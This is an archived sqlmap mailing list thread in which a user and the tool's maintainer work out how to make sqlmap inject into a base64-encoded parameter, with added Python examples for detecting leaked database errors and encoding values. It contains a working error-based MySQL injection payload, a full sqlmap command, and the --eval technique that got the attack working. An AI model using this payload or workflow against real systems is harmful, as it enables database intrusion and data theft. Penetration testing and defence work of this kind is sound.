Thread: [sqlmap-users] Where in the kb/conf.parameters does sqlmap store parsed variables?
From: Konrads S. <ko...@sm...> - 2014-10-30 12:31:53
Hello,

I am writing a small modification which would allow tampering with/decoding variables in the request. As I understand it, the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?

(Specifically, I have a base64 encoded string as a parameter, and to insert the payload the parameter must be base64-decoded, injected and then encoded back.)

--
Konrads Smelkovs
Applied IT sorcery.
From: Miroslav S. <mir...@gm...> - 2014-10-30 13:12:24
Hi.

In your case I would do this:

1) Decode the original base64 value and give it to sqlmap in decoded form (e.g. id=123 instead of the original id=313233)
2) Use --tamper=base64encode

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37
Miroslav,

I previously exploited this manually. The injection occurs in the MySQL INSERT statement. If the statement is invalid, we get an error message in HTML comments like so:

<!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->

Which is then exploitable using some well documented methods, such as appending a string like this:
' or extractvalue(1,concat(0x7e,(SELECT user()))) or'

which gives us a nice error:
<!--XPATH syntax error: '~root@localhost'-->

Anyhow, I got halfway there with the following string:
sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080

sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:

1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D

Also, none of the test vectors seem to trigger an error response.

I tried with --risk=3 to no avail.

version: 1.0-dev-1ef2c40

--
Konrads Smelkovs
Applied IT sorcery.
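The HTML-comment error leak quoted in the message above is something an application owner can scan for in their own responses. The following is an added example (not sqlmap's code and not from the thread) that runs a leak check over constructed sample bodies modelled on the two comments quoted in the post; the regular expressions and sample responses are assumptions for illustration.

```python
import re

# Constructed sample response bodies (not captured from any real host): the
# first two mimic the HTML-comment leaks quoted in the post, the third is clean.
SAMPLE_RESPONSES = [
    "<html><body>ok<!--You have an error in your SQL syntax; check the manual that "
    "corresponds to your MySQL server version for the right syntax to use near "
    "''lalalaa))) or'')' at line 1--></body></html>",
    "<html><body><!--XPATH syntax error: '~root@localhost'--></body></html>",
    "<html><body><!-- build 42 --><p>Thanks for your order</p></body></html>",
]

# Verbose MySQL diagnostics that should never reach a client, even inside a comment.
MYSQL_ERROR_PATTERNS = [
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"XPATH syntax error:", re.I),
]

# Non-greedy, DOTALL so multi-line comments are captured whole.
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)


def find_leaked_db_errors(body: str) -> list:
    """Return the HTML comments in `body` that carry a MySQL error message."""
    hits = []
    for comment in HTML_COMMENT.findall(body):
        if any(p.search(comment) for p in MYSQL_ERROR_PATTERNS):
            hits.append(comment.strip())
    return hits


def scan_responses(bodies) -> list:
    """(index, comment) pairs for every response that leaks a database error."""
    return [(i, hit)
            for i, body in enumerate(bodies)
            for hit in find_leaked_db_errors(body)]


if __name__ == "__main__":
    for idx, leak in scan_responses(SAMPLE_RESPONSES):
        print(f"response {idx} leaks a DB error in an HTML comment: {leak[:60]}...")
```

The same check can be pointed at saved proxy logs or a staging crawl; the fix on the application side is to stop emitting database diagnostics into the page at all, commented or not.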
From: Miroslav S. <mir...@gm...> - 2014-11-02 17:10:35
Then please try --eval instead of --tamper.

E.g. --eval="param=param.encode('base64')"

Bye
From: Konrads S. <ko...@sm...> - 2014-11-03 07:29:32
Cheers, works!

--
Konrads Smelkovs
Applied IT sorcery.
From: Konrads S. <ko...@sm...> - 2014-11-03 20:20:54
Just as a note - I had to do data.encode("base64").strip() to remove the newline which the encode adds.

--
Konrads Smelkovs
Applied IT sorcery.
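As an added example (not sqlmap's own code and not from the thread), this Python 3 stand-in for the wrapping that --eval="data=data.encode('base64').strip()" performs shows why the strip() in the last message was needed, and a newline-free, URL-quoted way to do the same wrap. The value is the one from the thread's command line; the function names and the use of the codecs module as a stand-in for Python 2's str.encode('base64') are assumptions.

```python
import base64
import codecs
from urllib.parse import quote, unquote

# Parameter value taken from the sqlmap command line in the thread.
ORIGINAL_VALUE = "DATA:User=Test,CC=4512634722348842,CVV=1337"


def legacy_base64(value: bytes) -> bytes:
    # Stand-in for Python 2's value.encode('base64') (assumption): the base64
    # codec appends a newline (and wraps at 76 chars), which is why the thread
    # needed .strip() before the value was sent.
    return codecs.encode(value, "base64")


def encode_param(value: str) -> str:
    # Newline-free base64 followed by URL quoting, so the '=' padding reaches
    # the server intact (it shows up as %3D on the wire, as in the thread).
    raw = base64.b64encode(value.encode("utf-8")).decode("ascii")
    return quote(raw, safe="")


def decode_param(encoded: str) -> str:
    # Inverse: undo URL quoting, then strict base64 (raises on bad padding).
    return base64.b64decode(unquote(encoded), validate=True).decode("utf-8")


def legacy_matches_after_strip(value: str) -> bool:
    # The legacy codec output is only equal to the clean encoding once the
    # trailing newline is stripped.
    legacy = legacy_base64(value.encode("utf-8"))
    clean = base64.b64encode(value.encode("utf-8"))
    return legacy.endswith(b"\n") and legacy.strip() == clean


if __name__ == "__main__":
    wire = encode_param(ORIGINAL_VALUE)
    print("wire value:", wire)
    print("round trip ok:", decode_param(wire) == ORIGINAL_VALUE)
    print("legacy codec needs strip():", legacy_matches_after_strip(ORIGINAL_VALUE))
```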